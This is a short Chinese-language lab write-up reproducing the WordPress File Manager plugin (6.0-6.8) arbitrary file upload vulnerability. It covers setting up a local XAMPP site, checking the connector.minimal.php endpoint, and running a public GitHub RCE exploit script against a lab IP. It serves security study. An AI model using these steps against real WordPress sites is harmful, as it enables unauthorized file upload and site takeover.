简介

WordPress是使用PHP语言开发的博客平台，用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统（CMS）来使用。File-Manager插件介绍文件管理器 File Manager 为您提供编辑、删除、上载、下载、复制和粘贴文件和文件夹的功能。可以轻松地将文件夹或任何文件从一个位置复制，移动到另一个位置。File Manager 插件分为免费版本和收费版本。

环境搭建

下载地址

WordPress下载地址

https://www.softonic.cn/download/wordpress/windows/post-download/v/5.4.1

插件下载地址 （影响版本File Manager 6.0-6.8）

http://plugins.svn.wordpress.org/wp-file-manager/tags/6.0/

安装XAMPP,搭建WordPress

安装XAMPP

将下载的WordPress安装文件复制到XAMPP的htdocs文件夹下

点击XAMPP中MySql栏的Admin按钮，配置安装WordPress需要用到的数据库

安装WordPress，配置需要用到的数据库及站点用户名密码

安装完成后进入仪表盘

上传所需要的插件并安装

漏洞复现

访问

http://192.168.92.131/wp/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php

可以发现errUnknownCmd疑似漏洞

下载漏洞利用工具进行测试

https://github.com/xDro1d/wp-file-manager

py -3 file_manager_Rce.py -u http://192.168.92.131/wp

参考链接

WordPress插件File-Manager任意文件上传漏洞_m0_48520508的博客-CSDN博客

https://blog.csdn.net/m0_48520508/article/details/110817435

来源：freebuf.com 2020-12-24 09:26:01 by: 你伤不到我哒